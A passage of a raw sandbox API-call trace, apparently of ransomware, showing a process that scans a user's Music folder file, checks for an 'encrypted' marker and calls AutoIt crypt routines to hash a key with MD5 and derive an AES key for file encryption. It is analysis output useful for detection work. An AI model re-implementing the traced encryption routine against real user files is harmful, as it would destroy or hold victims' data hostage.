wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zpoE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="poE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oE-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XwzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wzeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zeBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eBvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BvpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vpPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pPNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PNc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nc\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wiOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iOEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OEx9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ex9T.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.140] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.140] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0039.140] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.140] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.140] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.140] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.140] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.140] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.140] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.140] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa57f2460, ftCreationTime.dwHighDateTime=0x1d5bd3f, ftLastAccessTime.dwLowDateTime=0x5a013ad0, ftLastAccessTime.dwHighDateTime=0x1d5b77e, ftLastWriteTime.dwLowDateTime=0x5a013ad0, ftLastWriteTime.dwHighDateTime=0x1d5b77e, nFileSizeHigh=0x0, nFileSizeLow=0x112e1, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="wiOEx9T.wav", cAlternateFileName="")) returned 0x7c2100 [0039.141] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.141] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.141] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.141] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.141] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.141] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.141] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.141] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0039.141] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.141] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.141] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0039.141] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.141] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.141] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.141] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.141] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.141] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0039.142] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.142] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0039.142] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.143] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.143] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0039.143] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.143] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.143] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.143] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.143] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.143] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.143] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.143] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.143] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.143] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.143] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.143] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.143] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0039.143] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.143] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.143] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.143] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.143] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.143] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.144] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.144] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.144] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.144] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.144] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.144] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.144] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.144] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.144] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.144] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.144] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.144] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.144] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.144] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0039.144] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.144] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.144] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.144] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.145] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0039.145] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.145] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.145] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.145] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.145] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.145] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0039.145] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.145] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.145] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.145] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.145] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.145] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.145] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.145] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.145] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0039.145] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 